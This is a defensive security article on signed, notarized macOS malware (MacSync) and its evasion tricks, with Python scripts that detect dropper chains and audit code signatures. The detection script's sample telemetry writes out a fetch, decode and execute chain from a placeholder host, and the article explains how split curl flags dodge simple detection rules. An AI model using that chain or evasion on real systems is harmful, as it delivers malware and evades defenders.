
Signed and notarized macOS malware turns Apple's code-signing trust model against its users: a valid signature no longer separates trustworthy software from malicious software, which makes detection harder for enterprises. The shift signals a broader move toward legitimate-looking binaries and raises the stakes for endpoint protection.
The emergence of signed, notarized macOS malware marks a turning point in threat actor tactics. With a legitimate Developer ID certificate and a notarization ticket, a malicious binary clears Gatekeeper without the warning an unsigned download would trigger, and XProtect's signature rules only catch it once Apple has shipped a rule for that sample or revoked the certificate. Presenting malware as a trustworthy application reduces friction for victims, who see a normal install rather than a security prompt, and it weakens defenses built on static signatures, forcing security teams to lean on behavioral analytics and reputation services instead.
MacSync exemplifies this evolution. The Swift-based dropper ships in a DMG named "zk-call-messenger-installer-3.9.2-lts.dmg" and fetches a Base64-encoded payload with curl, writing the flags as -fL -sS plus --noproxy rather than the familiar -fsSL, so a detection that keys on the literal -fsSL string misses it. The installer is padded to 25.5 MB with unrelated PDFs, which buries the small dropper logic in bulk and slows quick static analysis. Once decoded, the payload is a Go-written agent that takes commands from a remote server, extending the malware from credential theft to a full backdoor.
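One way to turn the dropper behavior described above into a detection, as an added example that is not code from the MacSync analysis or from any EDR product: the script below walks constructed process-execution events (the record fields, the paths and the example.invalid domain are assumptions) and flags a parent process whose children fetch with a quiet, redirect-following, proxy-bypassing curl, base64-decode what was fetched, and then execute the result. Splitting or merging curl's short flags makes no difference because the flags are normalised first, so -fL -sS and -fsSL are treated alike.

```python
"""Flag fetch -> decode -> execute dropper chains in macOS process telemetry.

Added example, not code from the MacSync write-up or from any EDR vendor.
The events below are constructed; the record fields (pid, ppid, exe,
cmdline) and the domain example.invalid are assumptions, not a real schema
or a real indicator. Events are assumed to be listed in execution order.
"""
from __future__ import annotations

import os
import shlex

# Constructed telemetry: a DMG is opened, the mounted installer fetches a
# payload with curl, decodes it with base64, marks it executable and runs it.
# The last event is a benign curl from a shell, to show it is not flagged.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 1, "exe": "/usr/bin/open",
     "cmdline": "open /Users/jdoe/Downloads/zk-call-messenger-installer-3.9.2-lts.dmg"},
    {"pid": 502, "ppid": 501, "exe": "/Volumes/Installer/Installer.app/Contents/MacOS/Installer",
     "cmdline": "/Volumes/Installer/Installer.app/Contents/MacOS/Installer"},
    {"pid": 503, "ppid": 502, "exe": "/usr/bin/curl",
     "cmdline": "curl -fL -sS --noproxy '*' https://example.invalid/p/stage2.txt -o /tmp/.s2"},
    {"pid": 504, "ppid": 502, "exe": "/usr/bin/base64",
     "cmdline": "base64 -D -i /tmp/.s2 -o /tmp/.agent"},
    {"pid": 505, "ppid": 502, "exe": "/bin/chmod", "cmdline": "chmod +x /tmp/.agent"},
    {"pid": 506, "ppid": 502, "exe": "/tmp/.agent", "cmdline": "/tmp/.agent"},
    {"pid": 601, "ppid": 600, "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz"},
]

# macOS base64 accepts -D (older releases) and -d/--decode (newer) for decoding.
DECODE_FLAGS = {"-D", "-d", "--decode"}
# fail silently, follow redirects, silent, but show errors: the dropper's combination.
QUIET_FOLLOW = {"-f", "-L", "-s", "-S"}


def expand_curl_flags(cmdline: str) -> set[str]:
    """Return curl's options with bundled short flags split out, so that
    '-fL -sS', '-fsSL' and '-f -L -s -S' all normalise to the same set.
    Long options are kept up to any '=' ('--noproxy=*' -> '--noproxy')."""
    flags: set[str] = set()
    for tok in shlex.split(cmdline)[1:]:
        if tok.startswith("--") and len(tok) > 2:
            flags.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            flags.update("-" + ch for ch in tok[1:])
    return flags


def _opt_value(tokens: list[str], names: set[str]) -> str | None:
    """Value following the first token in `names`, e.g. the path after -o."""
    for i, tok in enumerate(tokens[:-1]):
        if tok in names:
            return tokens[i + 1]
    return None


def find_dropper_chains(events: list[dict]) -> list[dict]:
    """Group events by parent and look for the chain under one parent.
    Severity grows with the stages seen: a lone quiet, proxy-bypassing curl
    is 'low'; decoding what it fetched is 'medium'; running the result is 'high'."""
    exe_of = {ev["pid"]: ev["exe"] for ev in events}
    by_parent: dict[int, list[dict]] = {}
    for ev in events:
        by_parent.setdefault(ev["ppid"], []).append(ev)

    findings = []
    for ppid, children in by_parent.items():
        stages: list[str] = []
        fetched = decoded = None
        for ev in children:
            toks = shlex.split(ev["cmdline"])
            name = os.path.basename(ev["exe"])
            if name == "curl":
                flags = expand_curl_flags(ev["cmdline"])
                if QUIET_FOLLOW <= flags and "--noproxy" in flags:
                    stages.append("curl:quiet-follow-noproxy")
                    fetched = _opt_value(toks, {"-o", "--output"})
            elif name == "base64" and DECODE_FLAGS & set(toks) and fetched in toks:
                stages.append("base64:decode-fetched")   # decodes the file curl wrote
                decoded = _opt_value(toks, {"-o", "--output"})
            elif decoded is not None and ev["exe"] == decoded:
                stages.append("exec:decoded-payload")
        if stages:
            parent_exe = exe_of.get(ppid, "<unknown>")
            findings.append({
                "parent_pid": ppid, "parent_exe": parent_exe,
                # Installers run straight from a mounted DMG live under /Volumes.
                "from_mounted_volume": parent_exe.startswith("/Volumes/"),
                "stages": stages,
                "severity": ("low", "medium", "high")[min(len(stages), 3) - 1],
            })
    return findings


if __name__ == "__main__":
    for f in find_dropper_chains(SAMPLE_EVENTS):
        print(f["severity"], f["parent_exe"], "->", " -> ".join(f["stages"]))
```

In production the same logic runs over EDR or Endpoint Security framework process events rather than a hard-coded list. The chain, not any single command, is the signal: curl with --noproxy or base64 -D on its own is common in legitimate scripts, which is why the benign release download in the sample is left alone.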
For enterprises, the rise of signed macOS threats demands a reassessment of endpoint security posture. Apple's built-in protections are a baseline, not a verdict: a valid Developer ID signature tells you who signed the code, not whether it is safe. Organizations should deploy EDR that monitors anomalous execution patterns, such as an app launched from a freshly mounted DMG spawning curl and base64, or network calls to obscure domains. Regularly auditing the code-signing identities (Team IDs) present in the fleet, enforcing strict application allowlists so that an unknown team is treated as unknown software even when the binary is notarized, and teaching users that "right-click, then Open" install instructions are a red flag are essential steps to mitigate this growing vector.
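As an added example of the certificate auditing and allowlisting step, not code from the article or from Apple: the script below parses the text that `codesign -dvvv` prints for a bundle and rates it by Team ID against a hypothetical allowlist. The three codesign outputs are constructed samples in codesign's real key=value layout; the paths, Team IDs and company names in them are placeholders. The article's point shows up directly: the second sample has a valid Developer ID chain and the hardened runtime flag, exactly what a notarized binary would show, and is still only "review" because its team is unknown.

```python
"""Audit Developer ID signatures from `codesign -dvvv` output against a Team
ID allowlist. Added example, not code from the article or from Apple. The
three texts below are constructed samples in the key=value format that
`codesign --display -vvv` prints to stderr; paths, Team IDs and company
names are placeholders. On a Mac, feed the real output in with:
    codesign -dvvv /path/to/App.app 2>&1
"""
import re

# Hypothetical allowlist of Team IDs the organisation has vetted.
KNOWN_TEAMS = {"ABCDE12345": "Example Corp"}

SAMPLE_TRUSTED = """Executable=/Applications/ExampleApp.app/Contents/MacOS/ExampleApp
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=8987
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
"""

# Valid Developer ID chain and hardened runtime, but a team nobody vetted:
# the situation the article describes.
SAMPLE_UNKNOWN = """Executable=/Volumes/Installer/Installer.app/Contents/MacOS/Installer
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20500 size=900 flags=0x10000(runtime) hashes=20+7 location=embedded
Signature size=8900
Authority=Developer ID Application: Placeholder Dev LLC (ZZZZ999999)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ZZZZ999999
"""

# Ad-hoc signed binary: no certificate chain, no team.
SAMPLE_ADHOC = """Executable=/tmp/.agent
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=400 flags=0x2(adhoc) hashes=8+2 location=embedded
Signature=adhoc
TeamIdentifier=not set
"""

LEAF_RE = re.compile(r"^Developer ID Application: (.+) \(([A-Z0-9]{10})\)$")


def parse_codesign(text: str) -> dict:
    """Extract the trust-relevant fields from codesign's key=value lines.
    'Signature size=N' and 'Signature=adhoc' share a prefix, so keys are
    compared whole; 'CodeDirectory v=...' is matched by prefix."""
    info = {"executable": None, "team_id": None, "authorities": [],
            "adhoc": False, "hardened_runtime": False}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "Executable":
            info["executable"] = value
        elif key == "Authority":
            info["authorities"].append(value)   # leaf first, root last
        elif key == "Signature" and value == "adhoc":
            info["adhoc"] = True
        elif key == "TeamIdentifier" and value != "not set":
            info["team_id"] = value
        elif key.startswith("CodeDirectory"):
            info["hardened_runtime"] = "(runtime)" in value
    return info


def assess(info: dict, allowlist: dict) -> dict:
    """allow / review / block. A valid chain from an unknown team is
    'review', never 'allow': the signature proves who signed the code,
    not that the code is safe."""
    team = info["team_id"]
    if info["adhoc"] or team is None:
        return {"verdict": "block", "team_id": team,
                "reasons": ["no Developer ID: ad-hoc or unsigned code"]}
    reasons = []
    leaf = info["authorities"][0] if info["authorities"] else ""
    m = LEAF_RE.match(leaf)
    if not m:
        reasons.append(f"leaf is not a Developer ID Application certificate: {leaf!r}")
    elif m.group(2) != team:
        reasons.append(f"leaf certificate team {m.group(2)} differs from TeamIdentifier {team}")
    if team not in allowlist:
        reasons.append(f"team {team} is not on the allowlist")
    if not info["hardened_runtime"]:
        reasons.append("hardened runtime flag not set")
    return {"verdict": "review" if reasons else "allow", "team_id": team, "reasons": reasons}


if __name__ == "__main__":
    for sample in (SAMPLE_TRUSTED, SAMPLE_UNKNOWN, SAMPLE_ADHOC):
        info = parse_codesign(sample)
        result = assess(info, KNOWN_TEAMS)
        print(result["verdict"], info["executable"], result["reasons"])
```

`codesign -d` only displays the embedded signature; it does not check that the signature is intact or that the certificate is still good. Pair the audit with `codesign --verify --deep --strict --verbose=2` and `spctl --assess --type execute --verbose` for validity and notarization status, and remember that revocation of a Developer ID certificate only becomes visible once the machine can reach Apple's servers.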